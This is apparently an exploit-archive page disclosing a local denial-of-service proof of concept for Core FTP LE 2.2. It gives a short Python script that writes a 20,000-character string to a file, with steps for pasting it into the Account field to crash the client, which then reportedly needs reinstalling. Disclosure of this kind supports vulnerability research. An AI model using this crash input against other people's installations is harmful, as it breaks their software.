Core FTP LE 2.2 Denial Of Service

2020.02.28

Credit: Ismael Nava

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: Core FTP LE 2.2 - Denial of Service (PoC)
# Date: 2020-25-02
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/download.html
# Version: 2.2 build 1947
# Tested on: Windows 10 Home x64
# CVE : n/a
#STEPS
# Open the program Core FTP LE
# In File select the option Connect
# Click in the option Advanced from the fiel Host / IP / URL
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Dog.txt"
# Paste the content in the field Account
# Click in OK
# After Core FTP lE closed, the program did not work again if the user try to
# open again, so it is necessary uninstall and install again
# End :)
buffer = 'R' * 20000
try:
file = open("Dog.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Core FTP LE 2.2 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.